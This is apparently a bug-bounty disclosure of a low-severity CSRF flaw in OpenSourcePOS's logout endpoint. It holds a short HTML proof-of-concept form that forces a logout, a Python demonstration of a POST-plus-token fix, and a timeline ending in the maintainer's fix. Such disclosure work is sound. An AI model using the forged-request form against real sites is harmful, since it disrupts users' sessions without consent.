Cross-Site Request Forgery (CSRF) in opensourcepos/opensourcepos

Valid

Reported on Dec 23rd 2021

Description

CSRF on the logout functionality. An attacker can log the user out by sending them a malicious link.

Proof of Concept

<!DOCTYPE html>
<html>
<body>
<form method="GET" action="https://dev.opensourcepos.org:443/home/logout">
    <input type="text" name="csrf_cookie_ospos_v3" value="b733af2ee56ba0678b8817af620a02d9">
    <input type="text" name="ospos_session" value="0ba22e9026f4c7c24749ebab3dc6ccea38acd43f">
    <input type="submit" value="Send">
</form>
</body>
</html>

Impact

This vulnerability is capable of logging the user out of their session.

Note

This is not an attack, it is a kind of annoyance to the user, though it is a valid CSRF. Using the POST method plus a CSRF token avoids this.
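To make the suggested fix concrete, here is an added example (not OpenSourcePOS's code; the Request and Session classes are constructed stand-ins) that places the GET-triggered logout from the PoC beside a hardened handler requiring POST plus a session-bound CSRF token:

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Constructed minimal request/session model; not the project's own framework objects.
@dataclass
class Request:
    method: str
    form: dict = field(default_factory=dict)

@dataclass
class Session:
    user: Optional[str]
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))

def logout_vulnerable(request: Request, session: Session) -> int:
    """Mirrors the reported behaviour: any request, including a GET from a link, ends the session."""
    session.user = None
    return 302  # redirect to login page

def logout_hardened(request: Request, session: Session) -> int:
    """Logout only on POST with a token that matches the one stored server-side in the session."""
    if request.method != "POST":
        return 405  # a link or image tag can only produce GET
    submitted = request.form.get("csrf_token", "")
    # Constant-time compare; a cross-site page cannot read the victim's session token to supply it.
    if not hmac.compare_digest(submitted, session.csrf_token):
        return 403
    session.user = None
    return 302

def demo() -> dict:
    """Run the four cases and return (status, remaining user) for each."""
    results = {}
    cross_site_get = Request("GET")  # what the PoC form above sends
    s = Session("alice")
    results["vuln_get"] = (logout_vulnerable(cross_site_get, s), s.user)
    s = Session("alice")
    results["hard_get"] = (logout_hardened(cross_site_get, s), s.user)
    s = Session("alice")
    results["hard_forged"] = (logout_hardened(Request("POST", {"csrf_token": "guess"}), s), s.user)
    s = Session("alice")
    results["hard_legit"] = (logout_hardened(Request("POST", {"csrf_token": s.csrf_token}), s), s.user)
    return results

if __name__ == "__main__":
    for case, outcome in demo().items():
        print(case, outcome)
```

Only the legitimate same-site POST carrying the session's own token ends the session; the cross-site GET from the PoC and a POST with a guessed token leave the user logged in.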

We are processing your report and will contact the opensourcepos team within 24 hours. 2 years ago
We have contacted a member of the opensourcepos team and are waiting to hear back 2 years ago
We have sent a follow up to the opensourcepos team. We will try again in 7 days. 2 years ago
jekkos validated this vulnerability 2 years ago
Asura-N has been awarded the disclosure bounty
The fix bounty is now up for grabs
jekkos (Maintainer), 2 years ago

I think this one is rather low severity; maybe some kind of DoS attack can be tricked this way, which could be annoying for a user. But besides that, the impact is rather low.

jekkos marked this as fixed with commit 9332d1 2 years ago
jekkos has been awarded the fix bounty
This vulnerability will not receive a CVE